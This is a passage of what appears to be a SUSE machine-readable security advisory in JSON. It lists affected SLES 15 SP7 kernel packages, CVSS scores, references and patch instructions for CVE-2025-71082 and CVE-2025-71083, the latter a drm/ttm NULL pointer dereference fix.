"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
